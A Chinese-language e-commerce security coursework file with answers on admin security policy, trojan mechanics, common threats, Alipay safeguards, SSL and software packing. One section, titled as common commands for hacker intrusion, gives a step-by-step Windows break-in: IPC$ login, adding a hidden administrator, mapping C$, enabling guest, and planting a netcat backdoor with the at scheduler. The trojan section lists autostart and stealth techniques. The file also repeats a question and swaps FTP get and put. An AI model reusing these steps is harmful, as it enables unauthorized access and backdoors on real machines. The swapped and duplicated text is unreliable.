电子商务安全导论

1．  作为系统管理员，你应该如何制订你的安全防护措施，请用一段文字论述说明。

·管理对象：系统基本管理、性能调优、故障恢复、域控制器管理、存储资源管理、部门管理、用户系统环境管理和网络设备管理等基本知识

·安全策略

·安全机制

·上机人员的管理：

·网络硬软件的管理(交换机、防火墙、网络管理软件)

 

2．  画出木马程序流程图，对木马的实现做出说明。

答：木马的实现技术：
　　1.木马的常用启动方式
　　对于一般的应用程序来说通常有下面的几种自启动方式：
　　a.把程序放入系统的启动目录中，注意在windows中有两个自启动目录；
　　b.把程序的自启动设置到系统配置文件中，如win.ini、system.ini等中；
　　c.在注册表中进行配置实现程序的自动启动；
　　d.把程序注册为系统服务；
　　c.替换系统文件；（该方法在目前的Windows2000及以后的操作系统中已经基本失效）；
　　木马为了达到隐藏自己的目标，通常在设置注册表启动项时具有很强的迷惑性，有些木马还可以随机更改有关的启动项。

　　2.木马的隐蔽性
　　木马的隐蔽性是木马能否长期存活的关键，这主要包括几方面的内容：
　　a.木马程序本身的隐蔽性、迷惑性；
　　在文件名的命名上采用和系统文件的文件名相似的文件名，设置文件的属性为系统文件、隐藏、只读属性等，文件的存放地点是不常用或难以发现的系统文件目录中；
　　b.木马程序在运行时的隐蔽性；
　　通常采用了远程线程技术或HOOK技术注入其他进程的运行空间，采用API HOOK技术拦截有关系统函数的调用实现运行时的隐藏，替换系统服务等方法导致无法发现木马的运行痕迹；
　　c.木马在通信上的隐蔽性；
　　可以采用端口复用技术不打开新的通信端口实现通信、采用ICMP协议等无端口的协议进行通信，还有些木马平时只有收到特定的数据包才开始活动，平时处于休眠状态。
　　d.不安全的木马技术；
　　具资料显示有些木马在运行时能够删除自身启动运行及存在的痕迹，当检测到操作系统重新启动时再重新在系统中设置需要启动自身的参数，这类木马存在的问题：不安全，当系统失效时（如断电、死机时）无法再次恢复运行。

 

 

3．  说明黑客经常使用的一些操作系统命令，黑客使用每一个命令的目的是什么？

·ping ：Ping是潜水艇人员的专用术语，表示回应的声纳脉冲，在网络中Ping 是一个十分好用的TCP/IP工具。它主要的功能是用来检测网络的连通情况和分析网络速度。

·telnet：通过使用Telnet,Internet用户可以与全世界许多信息中心图书馆及其它信息资源联系。Telnet远程登录的使用主要有两种情况。第一种是用户在远程主祝上有自己的帐号(Account)，即用户拥有注册的用户名和口令；第二种是许多Internet主机为用户提供了某种形式的公共Telnet信息资源，这种资源对于每一个Telnet用户都是开放的。Telnet是使用最为简单的Internet工具之一。

·nbtstat ：NBTSTAT命令可以用来查询涉及到NetBIOS信息的网络机器。另外，它还可以用来
消除NetBIOS高速缓存器和预加载LMHOSTS文件。这个命令在进行安全检查时非常有用。

·rlogin(远程登录)是一条UNIX命令,它允许一个有权限的用户通过网络登录到另一台UNIX机器(主机)上,并与其交互,就好像这个用户实际上就在这台主机前。

 

4．  查阅资料，用一段文字说明当前网络安全研究的前沿问题有哪些？

答：归纳起来，对电子商务应用影响较多、发生率较高的互联网安全事件可以分为网页篡改、网络蠕虫、拒绝服务攻击、特罗伊木马、计算机病毒、网络仿冒等，网页篡改、网络仿冒（Phishing），逐步成为影响电子商务应用与发展的主要威胁。
　　1.网页篡改
　　网页篡改是指将正常的网站主页更换为黑客所提供的网页。这是黑客攻击的典型形式。一般来说，主页的篡改对计算机系统本身不会产生直接的损失，但对电子商务等需要与用户通过网站进行沟通的应用来说，就意味着电子商务将被迫终止对外的服务。对企业网站而言，网页的篡改，尤其是含有攻击、丑化色彩的篡改，会对企业形象与信誉造成严重损害。
　　2.网络仿冒（Phishing）
　　网络仿冒又称网络欺诈、仿冒邮件或者钓鱼攻击等，是黑客使用欺诈邮件和虚假网页设计来诱骗收件人提供信用卡账号、用户名、密码、社会福利号码等，随后利用骗得的账号和密码窃取受骗者金钱。近年来，随着电子商务、网上结算、网上银行等业务在日常生活中的普及，网络仿冒事件在我国层出不穷，诸如中国银行网站等多起金融网站被仿冒。网络仿冒已经成为影响互联网应用，特别是电子商务应用的主要威胁之一。
　　网络仿冒者为了逃避相关组织和管理机构的打击，充分利用互联网的开放性，往往会将仿冒网站建立在其他国家，而又利用第三国的邮件服务器来发送欺诈邮件，这样既便是仿冒网站被人举报，但是关闭仿冒网站就比较麻烦，对网络欺诈者的追查就更困难了，这是现在网络仿冒犯罪的主要趋势之一。
　　3.网络蠕虫
　　网络蠕虫是指一种可以不断复制自己并在网络中传播的程序。这种程序利用互联网上计算机系统的漏洞进入系统，自我复制，并继续向互联网上的其他系统进行传播。蠕虫的不断蜕变并在网络上的传播，可能导致网络被阻塞的现象发生，从而致使网络瘫痪，使得各种基于网络的电子商务等应用系统失效。
　　4.拒绝服务攻击(Dos)
　　拒绝服务攻击是指在互联网上控制多台或大量的计算机针对某一个特定的计算机进行大规模的访问，使得被访问的计算机穷于应付来势凶猛的访问而无法提供正常的服务，使得电子商务这类应用无法正常工作。拒绝服务攻击是黑客常用的一种行之有效的方法。如果所调动的攻击计算机足够多，则更难进行处置。尤其是被蠕虫侵袭过的计算机，很容易被利用而成为攻击源，并且这类攻击通常是跨网进行的，加大了打击犯罪的难度。
　　5.特罗伊木马
　　特罗伊木马（简称木马）是一种隐藏在计算机系统中不为用户所知的恶意程序，通常用于潜伏在计算机系统中来与外界联接，并接受外界的指令。被植入木马的计算机系统内的所有文件都会被外界所获得，并且该系统也会被外界所控制，也可能会被利用作为攻击其他系统的攻击源。很多黑客在入侵系统时都会同时把木马植入到被侵入的系统中。

 

 

 

 

 

5．  分析论证支付宝的安全保障。

答：三大保障：数字证书、

　　支付宝账号和网络警察

　　为了保证支付宝的安全性，支付宝技术团队自发研制了数字证书，其安全性能得到各银行认同。而目前使用支付宝数字证书的用户越来越多。支付宝数字证书的安全性可以和银行网上银行专业版证书媲美。

　　关于支付宝账号的安全，支付宝目前采取了两重认证，一是实名认证，二是数字证书；另外用户的登录密码和支付密码分开；更有ＣＴＵ风险控制系统来不断监控交易来防范。到目前为止该控制系统已经配合银行和公安局破获了几起盗卡案。

　　银行帐户核实：银行帐户核实分为网上银行充值和支付宝提现认证两种方式，两种方式都支持中国工商银行和招商银行认证。网上银行充值方式，用户只需要先充值０．０１元到与淘宝帐户绑定的支付宝帐户中，即可在２个工作日内完成支付宝认证的全过程，０．０１将留在支付宝帐户中为会员本人所有。支付宝提现方式，支付宝将在３－５个工作日内充值一定金额到会员提供的银行帐户中，会员收到后重新登陆支付宝认证页面输入查询到的金额即可完成认证。

　　为了给建设安全诚信的网络交易平台提供一个坚实后盾，淘宝网曾于２００５年起在原有工作基础上，专门成立了网络安全部。这个部门特意聘请了原公安系统具有多年刑事侦察经验的高手负责，由富有网络技术和反网络诈骗经验的人员组成。他们将使用各种技术工具、结合自身多年积累的专业经验，专职负责跟踪监视淘宝网的日常在线交易，并不断制定和完善系统流程中的所有安全保护措施。该部门还和各地的公安部门和网监部门积极配合，联手行动，一旦发现存在网络交易欺诈等不诚信的犯罪行为，立即与各地公安网监部门一起进行严厉打击，决不姑息。

 

 

6．  寻找一款扫描程序，扫描一段IP，对你的扫描结果加以说明，要说明过程。

答：

 

 

7．  如何删除电脑中的默认共享(Net share C$/delete)？

8．  查阅资料，说明当前一些主流防火墙的主要功能和指标。

答：主要功能：防火墙,内置入侵检测,QOS,IP绑定,实时报警,日志和监控，VPN，路由

指标：实现技术、管理方式、功能配置、安全性、传输性能（吞吐量和并发连接数）

 

9．  加壳和脱壳是黑客常用的保护病毒的手段，试找加壳软件和脱壳软件，用它对文件处理，并加以说明。

答：1．所谓加壳，是一种通过一系列数学运算，将可执行程序文件或动态链接库文件的编码进行改变（目前还有一些加壳软件可以压缩、加密驱动程序），以达到缩小文件体积或加密程序编码的目的。

　　当被加壳的程序运行时，外壳程序先被执行，然后由这个外壳程序负责将用户原有的程序在内存中解压缩，并把控制权交还给脱壳后的真正程序。一切操作自动完成，用户不知道也无需知道壳程序是如何运行的。一般情况下，加壳程序和未加壳程序的运行结果是一样的。

  ２．加壳相当于加密软件，而脱壳则相当于解密软件，但在脱壳前首先要知道壳的类型(有侦测壳类型的工具)。一般分为手动（要求有一定的软件技术水平）和自动(专门脱壳工具)两种。

 

 

10．详细说明SSL协议工作的过程。

答：服务器认证阶段：

1）客户端向服务器发送一个开始信息“Hello”以便开始一个新的会话连接；

2）服务器根据客户的信息确定是否需要生成新的主密钥，如需要则服务器在响应客户的“Hello”信息时将包含生成主密钥所需的信息；

3）客户根据收到的服务器响应信息，产生一个主密钥，并用服务器的公开密钥加密后传给服务器；

4）服务器恢复该主密钥，并返回给客户一个用主密钥认证的信息，以此让客户认证服务器。
用户认证阶段：在此之前，服务器已经通过了客户认证，这一阶段主要完成对客户的认证。经认证的服务器发送一个提问给客户，客户则返回（数字）签名后的提问和其公开密钥，从而向服务器提供认证。

11．使用操作系统的NET系列命令，说明你是如何操作的。

12．网络支付主要采取的安全手段是什么？举例（某一个银行）说明。

答：1.电子信用卡

　  2.电子支票

3.电子现金

4.移动支付

 

13．分析使用SSL协议作电子商务交易的安全性。

答：SSL协议所采用的加密算法和认证算法使它具有较高的安全性，但也存在一些问题。

1．SSL协议采用的加密算法和认证算法

（1）加密算法和会话密钥

SSL V2协议和SSL V3协议支持的加密算法包括RC4、RC2、IDEA和DES，而加密算法所用的密钥由消息散列函数MD5产生。RC4、RC2是由RSA定义的，其中RC2适用于块加密，RC4适用于流加密。

（2）认证算法

认证算法采用X.509电子证书标准，是通过RSA算法进行数字签名来实现的。

2．SSL安全优势

（1）监听和中间人式攻击

（2）流量数据分析式攻击

（3）截取再拼接式攻击

（4）报文重发式攻击

3．SSL协议存在的问题

（1）密钥管理问题

（2）加密强度问题

（3）数字签名问题

 

 

 

 

 

系统管理员主要负责整个集团内部网络和服务器系统的设计、安装、配置、管理和维护工作，为内部网的安全运行做技术保障。，服务器是网络应用系统的核心，由系统管理员专门负责管理。

1、提供网络运行保障，维持网络和服务器系统的稳定、正常运转，及时解决网络和服务器系统故障，故障解决时间一般不得超过2小时。确保网络内用户能安全、高效的使用网络办公和学习。

2、网络系统的管理

网络设备是整个网络运转的核心，系统管理员必须保证网络核心交换机、二级交换机、路由器和防火墙等主干设备的正常运转。由于网络设备的特殊重要性，网络设备的配置管理由单一系统管理员完成，不设A、B角，其他任何人不得改动设备配置，为了保证特殊情况下的接管工作，系统管理员必须做好网络设备的配置记录，对每次的配置改动作纪录，并备份设备的配置文档，记录配置时间。

3、服务器系统的管理。服务器系统的管理采用A、B角制度，A管理员负责服务器日常的的管理工作，B管理员应掌握服务器的知识，当A管理员外出的时候担负管理服务器的职责。主要包括以下工作：

a、做好服务器配置、安装和改动记录，编写内部网络和系统运行日志，内容要详尽、科学。和服务器的配置的每次改动都要做记录，包括时间、原因、配置记录文件等。如果发生故障，就必须记录故障发生的时间、故障情况、处理方法，及预防措施等。

b、系统管理员要定期对硬盘进行整理，清除缓存或垃圾文件。

c、定期保存系统日志。

d、做好系统的硬件维护，对设备定期检查，定期清洁、除尘，保持设备正常运行。

e、网络设备或服务器的性能测试或系统软件的升级。

4、用户的管理。

服务器超级用户的密码要定期更换，密码设定要有一定的规定，不能少于八位，系统管理员不得对任何无关人员泄露。知道超级用户和密码的人员不得超过两人。

对服务器用户的权限进行严格、详细的审核，对废弃的用户要及时进行删除。用户要记录进数据库，以便查询，用户密码的设定不得少于六位字母或数字。系统管理员要严守保密制度，不得泄漏用户密码。

5、为了保证应用系统的正常运转，单一服务器上原则上提供单一应用服务，不得在单一服务器上同时提供两种应用服务（系统相互备份例外）。

6、为了保证系统的正常运转，系统管理员不得在应用服务器上做软件或系统功能试验，不得在应用服务器上随意安装与应用无关的软件，不得在服务器上安装盗版软件。基本保证单服务器单应用。

12、网络安全：按照《网络安全管理制度》严格执行。系统管理员要定期安装系统软件公司发布的补丁程序。

13、防病毒：网络内所有的服务器必须安装网络防病毒软件，并及时升级病毒定义文件。定期对服务器进行全面的病毒检测。对检测出的病毒要做病毒记录。

14、备份。

系统备份，对重要的应用服务器，要做双机备份（有条件的话），必须保证一旦一台服务器出现故障，另一台服务器能在最短的时间内切换使用。主要包括：邮件服务、Internet服务、DNS服务。

数据备份，做好网络内所有系统数据和应用数据的定期自动备份，定期做人工备份，确保数据的安全，要采用多种备份形式。
15、数据保密工作，对在Intranet或Internet上发布的信息，需要做保密处理的，必须进行密码或用户验证服务等处理，并对密码进行严格的管理。

 

 

 

 

 

 

 

 

一般黑客入侵所需要的几个常用命令

1：NET 

只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！ 

这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1 

net use //127.0.0.1/ipc$ "123456" /user:"hbx" 

退出的命令是 

net use //127.0.0.1/ipc$ /delte 

下面的操作你必须登陆后才可以用.登陆的方法就在上面. 

---------------------- 

下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户. 

我们加一个heibai的用户密码为lovechina 

net user heibai lovechina /add 

只要显示命令成功,那么我们可以把他加入Administrator组了. 

net localgroup Administrators heibai /add 

---------------------- 

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. 

net use z://127.0.0.1/c$ 

---------------------- 

net start telnet 

这样可以打开对方的TELNET服务. 

---------------------- 

这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。 

net user guest /active:yes 

---------------------- 

这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！ 

net user guest lovechina 

net命令果然强大啊！ 

2:at 

一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？ 

那么需要用AT命令，这里假设你已经登陆了那个服务器。 

你首先要得到对方的时间， 

net time //127.0.0.1 

将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其ID=1 

at //127.0.0.1 12:3 nc.exe 

这里假设了一个木马，名为NC.EXE,这个东西要在对方服务器上. 

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 

3:telnet 

这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. 

telnet 127.0.0.1 99 

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 

4:FTP 

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后，它会给用户名,密码,以及FTP服务器. 

在上传前需要登陆先，这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321 

ftp www.51.net 

他会要求输入用户,成功后会要求输入密码. 

---------------------- 

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:/下,传到对方D:/ 

get c:/index.htm d:/ 

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 

put c:/index.htm d:/ 

5:copy 

下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。 

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 

copy index.htm //127.0.0.1/c$/index.htm 

---------------------- 

如果你要复制到D盘下把C改为D，就行了！ 

copy index.htm //127.0.0.1/d$/index.htm 

---------------------- 

如果你要把他复制到WINNT目录里 

就要把输入 

copy index.htm //127.0.0.1/admin$/index.htm 

admin$是winnt 

 

 

 

 

安全策略：

1、避免安装或运行未经认证的不明软件或内容。了解电脑上正在运行哪些程序以及它们为什么运行。如果你不知道你的系统上都有什么，你就不能充分对你的系统进行保护。

　　2、不要让非管理员用户以系统管理员或者根权限身份登录。

　　3、保护你的e-mail。将所有进入的HTML内容转换为普通文本格式，阻止所有文件默认文件扩展，除了少数你希望允许通过的。

　　4、保护你的密码。设置较长的密码，普通用户来说，以10个字符或更长为佳，系统管理帐户为15个字符或更长为佳。执行帐户锁定，甚哪怕就只是一分钟的。在Windows系统里，禁用LM密码hash。在Unix/Linux下，使用较新的crypt(3)hash，MD5类型hash，或者如果你的操作系统支持的话，选择更好的bcrypt hash。

　　5、尽可能地使用默认禁用和最小化权限。当执行最小化权限的安全策略的时候，使用基于规则的安全。你应当一个IT规则一个组，而不是只有一个“IT安全组”。

　　6、定义和加强安全域。谁需要访问什么?什么类型的通信连接是合法的?回答这些问题然后设计周边防御。定义基准值，记录反常的通信量。

　　7、在可能的情况下加密所有的机密数据，特别是在便携式电脑和存储设备上。没有任何借口偷这个懒--你因丢失的数据而恶化的公共关系就可以说明一切了(当然，你可以看看AT&T，Veteran Affair美国部门，美国银行的下场)。

　　8、操作系统和所有程序的升级补丁管理。自我一下，你最近有没有升级你的Macromedia Flash，Real Player，和Adobe Acrobat呢?

　　9、尽可能地在网关和主机上装配反病毒、反垃圾邮件和反间谍套件。

　　10、模糊化地设置安全信息。重命名你的管理员和根权限帐户。不要以ExchangeAdmin来命名一个帐号。不要将你的文件服务器命名为如FS1，Exchange1或者GatewaySrv1登。在条件允许时将服务置于非默认端口：比如，你可以为内部用户和商业伙伴将SSH服务移到30456端口，RDP到30389，HTTP到30080等等。

　　11、在你的网络上扫描并调查未知TCP或者UDP端口监听。

　　12、跟踪记录每个用户在Internet上所浏览的区域和时间。将结果置于一个人人都可以接触到的实时在线报告中。这个建议就是使用户对自己互联网冲浪习惯进行自我管理(我敢打赌，这样同样会带来生产力上的突然提高)。

　　13、自动化安全策略。如果你不设为自动的话，它将处于一个不和谐的状态。

　　14、对全体雇员进行有关信息安全的教育，并制定合适的策略和程序。习惯于变化的和结构化的管理。对于不依从者经行严厉处罚。

 

 

9．  加壳和脱壳是黑客常用的保护病毒的手段，试找加壳软件和脱壳软件，用它对文件处理，并加以说明。

答：1．所谓加壳，是一种通过一系列数学运算，将可执行程序文件或动态链接库文件的编码进行改变（目前还有一些加壳软件可以压缩、加密驱动程序），以达到缩小文件体积或加密程序编码的目的。

　　当被加壳的程序运行时，外壳程序先被执行，然后由这个外壳程序负责将用户原有的程序在内存中解压缩，并把控制权交还给脱壳后的真正程序。一切操作自动完成，用户不知道也无需知道壳程序是如何运行的。一般情况下，加壳程序和未加壳程序的运行结果是一样的。